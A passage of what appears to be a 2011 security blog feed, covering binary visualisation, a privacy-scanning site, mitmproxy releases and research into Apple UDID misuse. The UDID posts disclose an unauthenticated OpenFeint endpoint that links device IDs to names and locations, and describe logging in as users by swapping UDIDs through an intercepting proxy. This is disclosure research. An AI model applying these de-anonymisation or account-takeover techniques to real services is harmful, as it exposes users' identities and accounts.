href="https://corte.si/posts/code/hilbert/portrait/">original post</a> for more.</p> <p>So, here's a Hilbert curve mapping of a binary file, using a Hilbert-order traversal of the RGB cube as a colour palette. Again, click on the image for the much nicer large scale version:</p> <div class="media"> <a href="hilbert-hilbert-large.png"> <img src="hilbert-hilbert.png" /> </a> </div> <p>This shows significantly more fine-grained structure, which might be good for a deep dive into a binary. On the other hand, the colours don't map cleanly to distinct byte classes, so the image is harder to interpret. An ideal hex viewer would let you flick between the two palettes for navigation.</p> <h2 id="the-code">The code</h2> <p>As usual, I'm publishing the code for generating all of the images in this post. 
The binary visualizations were created with <a rel="external" href="https://github.com/cortesi/scurve/blob/master/binvis">binvis</a>, which is a new addition to <a rel="external" href="https://github.com/cortesi/scurve">scurve</a>, my space-filling curve project. The curve diagrams were made with the "drawcurve" utility to be found in the same place.</p> netograph.com - Realtime privacy snapshots of the social web 2011-12-08T00:00:00+00:00 2011-12-08T00:00:00+00:00 https://corte.si/posts/netograph/launch/ <p>Today, I'm launching <a rel="external" href="http://netograph.com">Netograph</a>, a new privacy-related site that I've been hacking on over the past few months. The goal of the project is to provide you with a quick overview of the privacy picture for a URL, <strong>before</strong> you've clicked on the link. At the moment, Netograph scans <a rel="external" href="http://reddit.com">Reddit</a>, <a rel="external" href="http://news.ycombinator.com">Hacker News</a>, <a rel="external" href="http://pinboard.in">Pinboard</a>, <a rel="external" href="http://delicous.com">Delicious</a> and <a rel="external" href="http://digg.com">Digg</a> - links on these sites should show up within a few minutes of submission.</p> <p>For more details, head over to <a rel="external" href="http://netograph.com">netograph.com</a>. There you will also find <a rel="external" href="https://addons.mozilla.org/en-US/firefox/addon/netograph/">Firefox</a> and <a rel="external" href="https://chrome.google.com/webstore/detail/bfhmbldbigkpniinkmckafbgcajcbaai">Chrome</a> browser addons that let you view the Netograph report for a URL instantly with a right-click. 
Enjoy!</p> <div class="container"> <div class="row"> <div class="column"> <a href="http://netograph.com/starmap/1740"> <img src="ng-guardian.png"> guardian.co.uk </a> </div> <div class="column"> <a href="http://netograph.com/starmap/2512"> <img src="ng-techcrunch.png"> techcrunch.com </a> </div> <div class="column"> <a href="http://netograph.com/starmap/2457"> <img src="ng-reddit.png"> reddit.com </a> </div> </div> </div> <h2 id="what-s-next">What's next?</h2> <p>This is just the first step. As I hinted in a <a href="https://corte.si/posts/privacy/neighbourhoods-of-trust/">previous post</a>, the most interesting results from Netograph are likely to come from aggregating and cross-correlating the data for individual URLs. I'm already hard at work on this - the next iteration of Netograph will aim to shine some light on the sometimes shadowy network of third-parties that track and analyze nearly every URL we visit. I will also be publishing some interesting tidbits from this data corpus on my blog as I go along, so watch this space.</p> Otago Polytechnic Talk 2011-10-31T00:00:00+00:00 2011-10-31T00:00:00+00:00 https://corte.si/posts/talks/polytech/ <p>Further reading for the guest lecture I'm giving at Otago Polytechnic today:</p> <ul> <li>The talk I'm not giving: <a rel="external" href="https://www.owasp.org/index.php/Top_10_2010-Main">OWASP Top 10</a></li> <li>Tools: <a rel="external" href="http://getfirebug.com/">FireBug</a>, <a rel="external" href="https://addons.mozilla.org/en-US/firefox/addon/tamper-data/">TamperData</a>, <a rel="external" href="http://python.org">Python</a>.</li> <li>The <a href="http://en.wikipedia.org/wiki/Samy_(XSS)">Myspace Worm</a>, and Samy Kamkar's <a rel="external" href="http://namb.la/popular/tech.html">own explanation of the exploit</a>.</li> <li>Halvar Flake's <a rel="external" href="http://www.immunityinc.com/infiltrate/2011/presentations/Fundamentals_of_exploitation_revisited.pdf">Programming and state machines</a>, which is where 
I first saw the term "programming the weird machine".</li> </ul> Neighborhoods of trust on the web 2011-09-27T00:00:00+00:00 2011-09-27T00:00:00+00:00 https://corte.si/posts/privacy/neighbourhoods-of-trust/ <p>For the last fortnight I've been hard at work on a new project that aims to examine trust and security on the web at scale. The basic idea is to use a browser instance to render a URL, and then to extract all persistent state with browser forensic techniques afterwards. This gives you a dump of cookies, cache contents, Flash storage, HTML5 databases, and so on. At the same time, all traffic is routed through a specialised version of <a rel="external" href="http://mitmproxy.org">mitmproxy</a>, and captured for later analysis. The result is a very detailed snapshot of what viewing a given URL actually <em>does</em>. The next step is to do this "at scale" - this means running many instances of this process in parallel on headless servers, decoupling things using queues, backing it all onto a database, and then spending days and days fine-tuning. I'm happy with my progress so far - my infrastructure is now scanning all the URLs passing through <a rel="external" href="http://news.ycombinator.com">Hacker News</a>, <a rel="external" href="http://reddit.com">Reddit</a>, <a rel="external" href="http://digg.com">Digg</a>, <a rel="external" href="http://delicious.com">Delicious</a> and <a rel="external" href="http://pinboard.in">Pinboard</a> in realtime, without breaking a sweat.</p> <p>I am pretty excited about the possibilities for this project, and I'm exploring plans for the future with like-minded security folk. Get in touch if this interests you, and keep an eye on my blog for more news.</p> <p>After my pilot run, I had 150 gigs of data covering about 120 thousand URLs. 
Below is a quick peek at one tiny slice of this data - an appetizer for things to come.</p> <h2 id="neighborhoods-of-trust">Neighborhoods of trust</h2> <div class="media"> <a href="full.png"> <img src="wholegraph.png" /> </a> </div> <p>This graph shows structures that emerge from the way sites use third-party executable resources. In this context, "executable" means JavaScript, Flash and HTML, and "third-party" means domains other than the URL's own. The nodes in this graph are the third-party domains, and the edges are associations between them via the URLs I crawled. For example, if a site loaded scripts from both Google Analytics and from Doubleclick, that would create (or reinforce) an edge between the nodes "google-analytics.com" and "doubleclick.com". Using this data, I calculated a co-occurrence coefficient for the third-party sources, and then extracted the resulting neighbourhood structures <a rel="external" href="http://lanl.arxiv.org/abs/0803.0476">algorithmically</a>. The neighbourhood information was used to colour and lay out the graph, trying to keep nodes that are closely correlated together. Finally, nodes are scaled based on how many URLs reference them.</p> <p>The result is a rather stunning graph showing neighborhoods of trust - areas of the Internet bound together based on the third parties allowed to run code in users' browsers. I've spent a few hours playing with this data, and the sheer range of interesting structure is surprising. At one end of the spectrum, you can zoom in to the individual node relationships, and find small clusters of surprising sites that cross-load resources from each other, often because they are owned by the same entity. 
At the other end, countries, language groups, and broad fields of interest aggregate in huge tribes of kinship.</p> <p>Here are a few of the larger-scale features from the graph.</p> <h3 id="mainstream">Mainstream</h3> <div class="media"> <a href="wholegraph-b.png"> <img src="wholegraph-b.png" /> </a> </div> <p>The most widely used resources dominate in the neighbourhood extraction algorithm, which causes them to cluster together in their own super-community. The top nodes in this cluster, in descending order of occurrence, are: google-analytics.com, facebook.com, doubleclick.net, fbcdn.net, quantserve.com, twitter.com, google.com, googlesyndication.com, googleapis.com, scorecardresearch.net, facebook.net, addthis.com. These are also the top nodes overall.</p> <h3 id="japanese">Japanese</h3> <div class="media"> <a href="wholegraph-a.png"> <img src="wholegraph-a.png" /> </a> </div> <p>The main resources are hatena.ne.jp, microad.jp, mixi.jp, yahoo.co.jp, nakanohito.jp. More surprisingly, also in this cluster are topsy.com, appspot.com and postrank.com. Perhaps these resources are especially commonly used on Japanese sites.</p> <h3 id="russian">Russian</h3> <div class="media"> <a href="wholegraph-d.png"> <img src="wholegraph-d.png" /> </a> </div> <p>Top resources are yadro.ru, yandex.ru, rambler.ru, vkontakte.ru, openstat.net, userapi.com, shinystat.net, and dt00.net.</p> <h3 id="porn">Porn</h3> <div class="media"> <a href="wholegraph-c.png"> <img src="wholegraph-c.png" /> </a> </div> <p>And here we have a portion of the web dedicated to porn. The top resources are awempire.com, clickbank.net, picadmedia.com, getresponse.com, adultfriendfinder.com, adultadword.com, phcdn.com, juicyads.com, brazzers.com, etology.com, data-ero-advertising.com and viddler.com. 
A more surprising inclusion in this group is wufoo.com - I wonder if this is an artifact, or whether Wufoo really does have a use in the adult content world.</p> <h3 id="misc">Misc</h3> <div class="media"> <a href="wholegraph-e.png"> <img src="wholegraph-e.png" /> </a> </div> <p>Just to show that it's not all clear-cut, here's an example of a neighbourhood I find harder to explain. The top resources are netdna-cdn.com, amgdgt.com, trafficmp.com, ooyala.com, suitesmart.com, demdex.net, adfrontiers.com, lycos.com and break.com. I speculate that this group might be loosely aligned around a number of big CDNs and analysis suites.</p> <h2 id="tech">Tech</h2> <p>The graph in this post was created, analyzed and pre-processed using <a rel="external" href="http://projects.skewed.de/graph-tool/">graph-tool</a>, a great Python library for dealing with large graphs. The visualization and modularity analysis was done using the ever-wonderful <a rel="external" href="http://gephi.org/">Gephi</a>. If these aren't both in your arsenal of analysis tools, you're missing out.</p> Why the Apple UDID had to die 2011-09-09T00:00:00+00:00 2011-09-09T00:00:00+00:00 https://corte.si/posts/security/udid-must-die/ <p><strong>EDIT: A <a rel="external" href="http://blogs.wsj.com/digits/2011/09/19/privacy-risk-found-on-cellphone-games/">WSJ Digits article</a> is now up, containing responses from Zynga and Chillingo. Other networks declined to comment.</strong></p> <p>A UDID is a "Unique Device Identifier" - you can think of it as a serial number burned permanently into every iPhone, iPad and iPod Touch. Any installed app can access the UDID without requiring the user's knowledge or consent. We know that UDIDs are very widely used - in a sample of 94 apps I tested, <a href="https://corte.si/posts/security/apple-udid-survey/">74% silently sent the UDID to one or more servers on the Internet</a>, often without encryption. 
This means that UDIDs are not secret values - if you use an Apple device regularly, it's certain that your UDID has found its way into scores of databases you're entirely unaware of. Developers often assume UDIDs are anonymous values, and routinely use them to aggregate detailed and sensitive user behavioural information. One example is Flurry, a mobile analytics firm used by 15% of apps I tested, which can monitor application startup, shutdown, scores achieved, and a host of other application-specific events, all linked to the user's UDID. I recently showed that it was possible to use <a rel="external" href="http://en.wikipedia.org/wiki/OpenFeint">OpenFeint</a>, a large mobile social gaming network, to <a href="https://corte.si/posts/security/openfeint-udid-deanonymization/">de-anonymize UDIDs</a>, linking them to usernames, email addresses, GPS locations, and even Facebook profiles.</p> <p>This post looks at the way UDIDs are used in the broader social gaming ecosystem. The work is based on a simple question: what happens if we swap our UDID for another while communicating with the network? There are a number of ways to do this - in my case I used <a rel="external" href="http://mitmproxy.org">mitmproxy</a>, an intercepting HTTP/S proxy I developed which lets me re-write the traffic leaving a device on the fly. In most cases this was a simple matter of replacing one string with another, but two networks (Scoreloop and Crystal) prevented UDID substitution using cryptography. Unfortunately, both networks relied on the secrecy of key material distributed in the application binaries to every device. I have verified that it is possible to reverse engineer the application binaries to extract the key material and circumvent the cryptographic protection.</p> <p>The outcome of this experiment shows that social gaming networks systematically misuse UDIDs, resulting in serious privacy breaches for their users. 
All the networks I tested allowed UDIDs to be linked to potentially identifying user information, ranging from usernames to email addresses, friends lists and private messages. Furthermore, 5 of the 7 networks allow an attacker to log in as a user using only their UDID, giving the attacker complete control of the user's account. Two networks had further problems that compromised a user's Facebook and Twitter accounts - Crystal lets an attacker take control of a user's accounts by leaking API keys, while Scoreloop partially discloses users' friends lists, even if they are private.</p> <style> .yes { background-color: #d55858; color: #000000; } .no { background-color: #5bd65b; color: #000000; } </style> <table> <tr> <th></th> <th>Data leaked</th> <th>Login as user</th> <th>Social Media Accounts</th> </tr> <tr> <th><a href="http://www.chillingo.com/">Crystal</a></th> <td class="yes"> Username, friends, Facebook, Twitter, games played, location, email address </td> <td class="yes"> Yes </td> <td class="yes"> Control of Facebook, Twitter accounts</td> </tr> <tr> <th><a href="http://www.gameloft.com/">GameLoft</a></th> <td class="yes"> Username, email address, games played, nationality, friends </td> <td class="yes"> Yes </td> <td class="no"> No </td> </tr> <tr> <th><a href="http://www.geocade.com/">Geocade</a></th> <td class="yes"> Username, email address, games played, location </td> <td class="yes"> Yes </td> <td class="no"> No </td> </tr> <tr> <th><a href="http://openfeint.com/">OpenFeint</a></th> <td class="yes"> Username, last played game, online status, friends </td> <td class="yes"> Yes </td> <td class="no"> No </td> </tr> <tr> <th><a href="http://www.scoreloop.com/">Scoreloop</a></th> <td class="yes"> Email address, gender, username, nationality, friends </td> <td class="yes"> Yes </td> <td class="yes"> Access private Facebook and Twitter friends lists </td> </tr> <tr> <th><a href="http://plusplus.com/">Plus+</a></th> <td class="yes"> Username </td> <td 
class="no"> No </td> <td class="no"> No </td> </tr> <tr> <th><a href="http://www.zynga.com/">Zynga</a></th> <td class="yes"> First name, username, friends*, in-game messages*, mobile number*</td> <td class="yes"> Yes* </td> <td class="no"> No </td> </tr> </table> <p>* The starred Zynga findings rely on the fact that other networks can be used to obtain the user's email address using the UDID.</p> <p>There are two caveats to keep in mind while considering these results. First, the findings are based on the default settings for each social network - some networks may have settings that reduce the amount of information exposed. Second, some of the data leaked is optional - for instance, it's not mandatory for a user to link Facebook or Twitter accounts with any of the networks.</p> <p>All the affected companies and Apple were notified 5 weeks ago. The Crystal and Scoreloop teams have both repaired the problems that could lead to a follow-on compromise of a user's social network accounts. At the time of writing, it is still possible to log in as a user using only a UDID on five of the vulnerable networks.</p> <h2 id="the-future">The future</h2> <p>A few days after I notified the companies involved, it was revealed that Apple was <a rel="external" href="http://techcrunch.com/2011/08/19/apple-ios-5-phasing-out-udid/">quietly killing the UDID API</a>. It will still be present in iOS 5, but is marked deprecated, and will probably be removed in future. I recommend that developers shift away from using UDIDs now, rather than wait for formal removal of the API.</p> <p>We can now expect a frenzy of activity as developers look for alternatives. The challenge will be to make sure that the cure isn't as bad as the disease - Apple's recommendation to "create a unique identifier specific to your app" could tempt developers to replicate the UDID mechanism on a smaller scale, flaws and all. 
Expect more blog posts on this topic soon.</p> mitmproxy 0.6 2011-08-07T00:00:00+00:00 2011-08-07T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce0_6/ <div class="media"> <a href="..&#x2F;mitmproxy_0_4.png"> <img src="..&#x2F;mitmproxy_0_4.png" /> </a> </div> <p>I'm happy to announce the release of mitmproxy 0.6, featuring a redesigned scripting API, a slew of major new features and a panoply of small bugfixes and improvements.</p> <h2 id="changelog">Changelog</h2> <ul> <li>New scripting API that allows much more flexible and fine-grained rewriting of traffic. See the docs for more info.</li> <li>Support for gzip and deflate content encodings. A new "z" keybinding in mitmproxy to let us quickly encode and decode content, plus automatic decoding for the "pretty" view mode.</li> <li>An event log, viewable with the "v" shortcut in mitmproxy, and the "-e" commandline argument in both mitmproxy and mitmdump.</li> <li>Huge performance improvements both in the mitmproxy interface, and loading large numbers of flows from file.</li> <li>A new "replace" convenience method for all flow objects, that does a universal regex-based string replacement.</li> <li>Header management has been rewritten to maintain both case and order.</li> <li>Improved stability for SSL interception.</li> <li>Default expiry time on generated SSL certs has been dropped to avoid an OpenSSL overflow bug that caused certificates to expire in the distant past on some systems.</li> <li>A "pretty" view mode for JSON and form submission data.</li> <li>Expanded documentation and examples.</li> <li>Many other small improvements and bugfixes.</li> </ul> mitmproxy 0.5 2011-06-27T00:00:00+00:00 2011-06-27T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce0_5/ <div class="media"> <a href="..&#x2F;mitmproxy_0_4.png"> <img src="..&#x2F;mitmproxy_0_4.png" /> </a> </div> <p>I've just tagged and released mitmproxy 0.5. 
Everyone should update - this release squelches a few annoying performance killers. You can download it from the project website:</p> <h2 id="mitmproxy-org"><a rel="external" href="http://mitmproxy.org">mitmproxy.org</a></h2> <h2 id="changelog">Changelog</h2> <ul> <li>An -n option to start the tools without binding to a proxy port.</li> <li>Allow scripts, hooks, sticky cookies etc. to run on flows loaded from save files.</li> <li>Regularize command-line options for mitmproxy and mitmdump.</li> <li>Add an "SSL exception" to mitmproxy's license to remove possible distribution issues.</li> <li>Add a --cert-wait-time option to make mitmproxy pause after a new SSL certificate is generated. This can pave over small discrepancies in system time between the client and server.</li> <li>Handle viewing big request and response bodies more elegantly. Only render the first 100k of large documents, and try to avoid running the XML indenter on non-XML data.</li> <li><strong>BUGFIX</strong>: Make the "revert" keyboard shortcut in mitmproxy work after a flow has been replayed.</li> <li><strong>BUGFIX</strong>: Repair a problem that sometimes caused SSL connections to consume 100% of CPU.</li> </ul> UDID media roundup 2011-06-10T00:00:00+00:00 2011-06-10T00:00:00+00:00 https://corte.si/posts/security/udid-media-roundup/ <p>After a hectic month, I'm finally able to return to the UDID privacy issues I covered in my last few blog posts. 
I plan to publish some further results soon, but first, a quick roundup of the media coverage of the <a href="https://corte.si/posts/security/openfeint-udid-deanonymization/">OpenFeint UDID de-anonymization result</a>.</p> <ul> <li><a rel="external" href="http://blogs.wsj.com/digits/2011/05/11/the-privacy-risks-of-id-codes-in-your-apps/">A post on the Wall Street Journal tech blog</a> by <a rel="external" href="http://www.jennifervalentinodevries.com/">Jennifer Valentino-DeVries</a>, one of the very few journalists who do good, novel investigative work into issues like UDID privacy.</li> <li>An interview with <a rel="external" href="http://www.repubblica.it/tecnologia/2011/06/03/news/identificativo_iphone-17073898/">La Repubblica</a>, a major Italian daily.</li> <li>An article in <a rel="external" href="http://www.spiegel.de/netzwelt/gadgets/0,1518,761735,00.html">Der Spiegel</a>.</li> <li>Coverage on <a rel="external" href="http://articles.cnn.com/2011-05-09/tech/identity.iphones.ipads_1_apps-identifier-privacy?_s=PM:TECH">CNN online</a>, <a rel="external" href="http://www.wired.com/gadgetlab/2011/05/iphone-udid/">Wired Gadgetlab</a> and the <a rel="external" href="http://www.huffingtonpost.com/2011/05/10/iphone-udid-personal-information-identity_n_860139.html">Huffington Post</a>.</li> <li>And, last but not least, a <a rel="external" href="http://netsecpodcast.com/?p=772">nice 30-minute interview</a> with <a rel="external" href="https://twitter.com/#!/quine">Zach Lanier</a> from the <a rel="external" href="http://netsecpodcast.com/">Network Security Podcast</a>. 
This is your opportunity to get some more details on the OpenFeint issue and find out what a weird accent I have.</li> </ul> <p>The issue was also mentioned on many, many blogs and smaller publications.</p> How UDIDs are used: a survey 2011-05-19T00:00:00+00:00 2011-05-19T00:00:00+00:00 https://corte.si/posts/security/apple-udid-survey/ <p>I recently published some <a href="https://corte.si/posts/security/openfeint-udid-deanonymization/">research</a> showing that the OpenFeint social gaming network can be used to link Apple UDIDs to users' real-world identities. To understand why this is a problem, we have to look at the way UDIDs are used in the broader app ecosystem. Once we do this, we see that the vast majority of applications send UDIDs to servers on the Internet, and that UDID-linked user information is aggregated in literally thousands of databases on the net. In this context, UDID de-anonymization is a serious threat to user privacy.</p> <p>We have one good research paper surveying UDID use - in 2010, Eric Smith <a rel="external" href="http://www.pskl.us/wp/?p=476">looked at the unencrypted portion of app traffic</a>, and found that 68% of tested apps send UDIDs upstream in the clear. I was curious to see what the figures would look like if encrypted (HTTPS) traffic was included, so I decided to do my own survey, using <a rel="external" href="http://mitmproxy.org">mitmproxy</a> to analyse all traffic from the 94 applications I had installed on my iPhone. Below is a set of graphs highlighting the main facts. I've also published a list of all applications and the domains they contacted <a href="https://corte.si/posts/security/apple-udid-survey/appdomains.html">here</a> - it makes for interesting reading.</p> <h2 id="apps-are-noisier-than-you-think-they-are">Apps are noisier than you think they are</h2> <div class="media"> <a href="all_domains.png"> <img src="all_domains.png" /> </a> </div> <p>84% of apps tested contacted one or more domains during use. 
At the extreme end, <a rel="external" href="http://itunes.apple.com/us/app/idestroy-wicked-sick-stress/id309689677?mt=8">iDestroy</a> contacted 14 domains, including 3 different ad networks and OpenFeint.</p> <h2 id="and-send-your-udid-to-more-places-than-you-expect">... and send your UDID to more places than you expect</h2> <div class="media"> <a href="udid_domains.png"> <img src="udid_domains.png" /> </a> </div> <p>74% of apps tested sent the device UDID to one or more domains.</p> <h2 id="often-without-encryption">... often without encryption</h2> <div class="media"> <a href="udid_scheme.png"> <img src="udid_scheme.png" /> </a> </div> <p>46% of apps that transmitted UDIDs did so in the clear. 54% of apps transmitting UDIDs used encryption for all UDID traffic<sup class="footnote-reference"><a href="#1">1</a></sup>.</p> <h2 id="a-few-big-udid-aggregators-dominate">A few big UDID aggregators dominate</h2> <div class="media"> <a href="topdomains.png"> <img src="topdomains.png" /> </a> </div> <p>Three big aggregators of UDID-related data dominate: <a rel="external" href="http://apple.com">Apple</a>, <a rel="external" href="http://www.flurry.com">Flurry</a>, and <a rel="external" href="http://www.openfeint.com">OpenFeint</a>. Each one of these companies has the vast majority of UDIDs on file, linked to a rich set of privacy-sensitive information. OpenFeint's ubiquity is one of the reasons why UDID de-anonymization using their API is so serious.</p> <h2 id="behind-them-are-a-long-tail-of-smaller-aggregators">... 
behind them are a long tail of smaller aggregators</h2> <p>Here is a list of all the remaining domains that had UDIDs transmitted to them - a mixture of ad networks, analytics firms, individual developer sites, and online services.</p> <table> <tr> <td> ads.mp.mydas.mobi </td> <td> analytics.localytics.com </td> <td> api.dropbox.com </td> </tr> <tr> <td> bayobongo.com </td> <td> bbc.112.2o7.net </td> <td> beatwave.collect3.com.au </td> </tr> <tr> <td> catalog.lexcycle.com </td> <td> data.mobclix.com </td> <td> init.gc.apple.com </td> </tr> <tr> <td> msh.amazon.com </td> <td> notifications.lexcycle.com </td> <td> promo.limbic.com </td> </tr> <tr> <td> soma.smaato.com </td> <td> www.chimerasw.com </td> <td> www.phasiclabs.com </td> </tr> <tr> <td> www.trainyard.ca </td> <td> api.twitter.com </td> <td> ngpipes.ngmoco.com </td> </tr> <tr> <td> npr.122.2o7.net </td> <td> ws.tapjoyads.com </td> <td> </td> </tr> </table> <h2 id="methodology">Methodology</h2> <p>For each application, I started a logging instance of mitmdump, like so:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">mitmdump</span><span style="color: #005CC5;"> -w</span><span style="color: #032F62;"> appname</span></span></code></pre> <p>I then started up the application, interacted with anything that might elicit network traffic, and shut it down. The collected data was analyzed with a simple script that used the <a rel="external" href="http://mitmproxy.org/doc/library.html">libmproxy</a> API to traverse the traffic dumps and extract the needed information.</p> <div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup> <p>The fact that 54% of UDID-using apps would have gone undetected by Smith's study seems to indicate that there should be a much greater difference between our results - Smith found 68% of apps use UDIDs vs my 74%. 
The discrepancy can be accounted for by the fact that we used different samples - Smith used predominantly applications in Apple's "Top Free" lists, whereas I used both paid and unpaid applications that happened to be on my phone.</p> </div> De-anonymizing Apple UDIDs with OpenFeint 2011-05-04T00:00:00+00:00 2011-05-04T00:00:00+00:00 https://corte.si/posts/security/openfeint-udid-deanonymization/ <p>Every iPhone, iPad and iPod touch has an associated Unique Device Identifier (UDID). You can think of the UDID as a serial number burned into the device - one that can't be removed or changed<sup class="footnote-reference"><a href="#1">1</a></sup>. This number is exposed to app developers through an API, without requiring the device owner's permission or knowledge.</p> <p>Few Apple users realise just how widely their UDIDs are used. <a rel="external" href="http://www.pskl.us/wp/?p=476">Research shows</a> that 68% of apps silently send UDIDs to servers on the Internet. This is often accompanied by information on how, when and where the device is used. The most common destination for traffic containing a user's UDID is Apple itself, followed by the <a rel="external" href="http://www.flurry.com/">Flurry</a> mobile analytics network and OpenFeint, a mobile social gaming company. These companies are uber-aggregators of UDID-linked user information, because so many apps use their APIs. Trailing behind the big three are thousands of individual developer sites, ad servers and smaller analytics firms. Users have no way to stop their device from offering up their UDID, telling who their data is being sent to, or even telling that it's happening at all. 
This situation has caused wide-spread concern, including coverage in the <a rel="external" href="http://blogs.wsj.com/digits/2010/12/19/unique-phone-id-numbers-explained/">Wall Street Journal</a>, and <a rel="external" href="http://www.txinjuryblog.com/tags/udid-lawsuit/">two</a> <a rel="external" href="http://www.infosecurity-us.com/view/15643/apple-faces-second-lawsuit-over-udid-disclosure-to-third-parties/">lawsuits</a> aimed at Apple.</p> <p>The saving grace is that your device UDID is not linked to your real-world identity. If it were possible to de-anonymize UDIDs, the result would be a serious privacy breach. Apple is well aware of this, and <a rel="external" href="http://developer.apple.com/library/ios/#documentation/uikit/reference/UIDevice_Class/Reference/UIDevice.html">explicitly tells developers that they are not permitted to publicly link a UDID to a user account</a>.</p> <p>I recently published a tool called <a rel="external" href="http://mitmproxy.org">mitmproxy</a>, a man-in-the-middle proxy that allows one to intercept and monitor SSL-encrypted HTTP traffic. Using mitmproxy to view the encrypted traffic sent by my own iOS devices, I was able to observe protocols and data flows that have clearly received very little external review. 
A slew of interesting security results followed (keep an eye on this blog), but by far the most alarming was the fact that it was possible to use OpenFeint to completely de-anonymize a large proportion of UDIDs.</p> <h2 id="de-anonymizing-udids-with-openfeint">De-anonymizing UDIDs with OpenFeint</h2> <h3 id="linking-udids-to-openfeint-user-accounts">Linking UDIDs to OpenFeint user accounts</h3> <p>When an OpenFeint-enabled app is first fired up, it submits the device's UDID to OpenFeint's servers, which then return a list of associated accounts:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>https://api.openfeint.com/users/for_device.xml?udid=XXX</span></span></code></pre> <p>This is a completely unauthenticated call - you can try it out by cutting and pasting it into your browser, replacing XXX with <a rel="external" href="http://support.apple.com/kb/HT4061">your own UDID</a>. Here's an example of the response for my UDID, with sensitive information removed:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="xml"><span class="giallo-l"><span>&lt;?</span><span style="color: #22863A;">xml</span><span style="color: #6F42C1;"> version</span><span>=</span><span style="color: #032F62;">&quot;1.0&quot;</span><span style="color: #6F42C1;"> encoding</span><span>=</span><span style="color: #032F62;">&quot;UTF-8&quot;</span><span>?&gt;</span></span> <span class="giallo-l"><span>&lt;</span><span style="color: #22863A;">resources</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">user</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">chat_enabled</span><span>&gt;true&lt;/</span><span style="color: #22863A;">chat_enabled</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: 
#22863A;">gamer_score</span><span>&gt;XXX&lt;/</span><span style="color: #22863A;">gamer_score</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">id</span><span>&gt;XXX&lt;/</span><span style="color: #22863A;">id</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">last_played_game_id</span><span>&gt;187402&lt;/</span><span style="color: #22863A;">last_played_game_id</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">last_played_game_name</span><span>&gt;tiny wings&lt;/</span><span style="color: #22863A;">last_played_game_name</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">lat</span><span>&gt;XXX&lt;/</span><span style="color: #22863A;">lat</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">lng</span><span>&gt;XXX&lt;/</span><span style="color: #22863A;">lng</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">online</span><span>&gt;false&lt;/</span><span style="color: #22863A;">online</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">profile_picture_source</span><span>&gt;FbconnectCredential&lt;/</span><span style="color: #22863A;">profile_picture_source</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">profile_picture_updated_at</span><span>&gt;XXX&lt;/</span><span style="color: #22863A;">profile_picture_updated_at</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">profile_picture_url</span><span>&gt;http://XXX&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">uploaded_profile_picture_content_type</span><span style="color: #6F42C1;"> nil</span><span>=</span><span 
style="color: #032F62;">&quot;true&quot;</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;/</span><span style="color: #22863A;">uploaded_profile_picture_content_type</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">uploaded_profile_picture_file_name</span><span style="color: #6F42C1;"> nil</span><span>=</span><span style="color: #032F62;">&quot;true&quot;</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;/</span><span style="color: #22863A;">uploaded_profile_picture_file_name</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">uploaded_profile_picture_file_size</span><span style="color: #6F42C1;"> nil</span><span>=</span><span style="color: #032F62;">&quot;true&quot;</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;/</span><span style="color: #22863A;">uploaded_profile_picture_file_size</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">uploaded_profile_picture_updated_at</span><span style="color: #6F42C1;"> nil</span><span>=</span><span style="color: #032F62;">&quot;true&quot;</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;/</span><span style="color: #22863A;">uploaded_profile_picture_updated_at</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;</span><span style="color: #22863A;">name</span><span>&gt;XXX&lt;/</span><span style="color: #22863A;">name</span><span>&gt;</span></span> <span class="giallo-l"><span> &lt;/</span><span style="color: #22863A;">user</span><span>&gt;</span></span> <span class="giallo-l"><span>&lt;/</span><span style="color: #22863A;">resources</span><span>&gt;</span></span></code></pre> <p>Included is my latitude and longitude, the last game I played, my chosen account name, and my Facebook profile picture URL.</p> <h2 id="linking-udids-to-gps-co-ordinates">Linking UDIDs to GPS co-ordinates</h2> <p>If the user 
